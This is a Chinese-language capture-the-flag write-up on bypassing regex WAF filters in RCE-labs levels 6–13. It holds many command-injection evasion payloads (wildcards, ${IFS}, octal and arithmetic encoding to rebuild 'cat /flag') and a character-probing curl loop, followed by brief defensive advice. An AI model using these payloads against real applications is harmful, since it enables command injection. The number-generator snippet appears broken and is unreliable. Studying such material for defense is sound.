从Level6到Level13:手把手带你绕过RCE靶场中的那些“奇葩”WAF
从Level6到Level13:手把手带你绕过RCE靶场中的那些“奇葩”WAF
在Web安全领域,命令注入(RCE)始终是攻防双方博弈的焦点。当开发者试图通过WAF规则封锁危险字符时,攻击者总能找到意想不到的绕过方式。本文将带你深入分析RCE-labs靶场Level6至Level13关卡中那些看似"奇葩"的WAF规则,并拆解如何像侦探一样通过字符特性、系统机制和编码技巧构造有效Payload。
1. WAF规则逆向工程方法论
面对陌生WAF时,系统化的分析流程比盲目尝试更重要。以下是经过实战验证的三步分析法:
字符黑名单测绘
通过报错信息或响应差异,逐步测试哪些字符被拦截。例如Level6的过滤规则:if(preg_match("/[b-zA-Z_@#%^&*:{}\-+<>\"|`;\[\]]/", $cmd)){ die("WAF!"); }关键发现:数字和小写字母a未被过滤,这为通配符利用创造了条件。
系统机制替代方案
- 空格过滤 → 用
${IFS}、%09或重定向符号<替代 - 斜杠过滤 → 用环境变量
${PWD:0:1}获取根目录符号 - 字母过滤 → 用八进制编码
$\'\\xxx\'表示字符
- 空格过滤 → 用
上下文逃逸技巧
场景类型 典型方案 案例演示 输出被屏蔽 重定向到文件 cat /flag > /tmp/out命令被截断 分号或注释符提前终止 ; cat /flag #多级过滤 混合编码与变量替换 Level13的取反构造数字
提示:实际测试时建议从简单字符开始逐步组合,避免触发WAF的频次检测机制。
2. 通配符的艺术:当字母成为奢侈品
Level6展示了一个极端案例——几乎所有字母都被禁止时如何执行命令。此时需要关注两个关键点:
Bash通配符的妙用
/???/?a?这个神奇组合能够匹配/bin/cat,其原理是:?匹配任意单个字符*匹配任意长度字符(但本例中被过滤)- 通过排列组合可以精准定位目标二进制文件
受限字符集的利用
构造Payload时需要先确认可用字符:# 可用字符检测脚本示例 for char in {!,@,#,$,%,^,&,*,(,),-,_,+,=,{,\},|,\,:,<,>,.,?,/}; do curl -s "http://target/?cmd=echo$char" | grep -q "WAF" || echo "可用字符: $char" done
实战中更复杂的案例是Level7,它仅过滤空格和"flag"关键词。此时需要:
# 空格替代方案 cat${IFS}/fla* # 使用内置变量 cat%09/fla* # URL编码的TAB cat<fla* # 重定向符号3. 编码的魔术:从八进制到二进制
当常规字符全军覆没时,编码转换成为救命稻草。Level9-11演示了三种典型方案:
3.1 八进制ASCII编码(Level9)
# 原始命令:cat /flag $'\143\141\164' $'\57\146\154\141\147' # 生成工具原理 def oct_encode(cmd): return ' '.join(["$'\\" + oct(ord(c))[2:] + "'" for c in cmd])3.2 二进制整数替换(Level10)
# 数字1和0未被过滤时 $((2#101010)) # 等于十进制42 $0<<<$0\<\<\<\$'\\$(($((1<<1))#1000111))' # 生成字母G3.3 数字1的变量替换(Level11)
# 用${##}替代数字1 ${##} # 值为1 $((${##}<<${##})) # 1左移1位得到2(二进制基数) $(($((${##}<<${##}))#${##}000${##})) # 二进制10001=17注意:二进制构造时需考虑URL编码问题,#符号需要转换为%23
4. 数学魔法:用取反构造任意数字
Level13将绕过艺术推向新高度——当所有数字都被禁止时,如何从零构造所需数字:
$(()) # 值为0 $((~$(()))) # 按位取反得到-1 $((~$((~$(()))))) # 对-1取反得到0 $(( $((~$(()))) $((~$(()))) )) # -1 + -1 = -2通过这种技巧可以累加出任意ASCII码。例如构造字母c(ASCII 99):
# 计算表达式生成算法 def generate_number(n): if n == 0: return "$(())" return "$(( {} {} ))".format( generate_number(abs(n)-1), "$((~$(())))" if n>0 else "$(($((~$(()))) $((~$(())))))" ) # 生成字母c的表达式 generate_number(99) # 约200个字符的嵌套表达式5. 自动化工具与防御建议
对于这类复杂绕过,推荐使用开源工具提高效率:
BashFuck
支持多种编码模式的Payload生成器:python3 bashfuck.py -c 'cat /flag' --level 13防御方案对比
防御方式 优点 局限性 白名单校验 误报率低 需要精确预知合法输入 语法树分析 能识别混淆代码 实现复杂,性能开销大 沙箱执行 动态检测危险行为 可能被环境差异绕过 命令执行监控 实时阻断高风险操作 需要精细配置规则阈值
在实战中,建议开发者采用纵深防御策略:
- 前端输入校验(正则白名单)
- 后端参数化查询(如
subprocess.run(["/bin/cat", filename])) - 系统层级的权限控制(最小权限原则)
6. 从靶场到实战的思维转换
通过这8个关卡的训练,我们应该建立起系统化的绕过思维:
字符维度
- 测试所有可打印字符的过滤情况
- 寻找未被过滤的"黄金字符"(如Level6中的
?)
编码维度
- 尝试不同进制编码(八进制/十六进制/Unicode)
- 利用变量替换构造关键字符
系统维度
- 研究Shell解析器的特性(如重定向、管道)
- 利用环境变量存储关键数据
上下文维度
- 分析输出处理逻辑(如Level8的重定向截断)
- 检测是否存在二次解析机会
最后记住:真正的安全防护不在于堆砌WAF规则,而在于理解攻击者的思维模式。建议每解决一个靶场关卡后,尝试站在防御者角度思考如何改进过滤策略,这种双向思维训练才是提升安全能力的核心。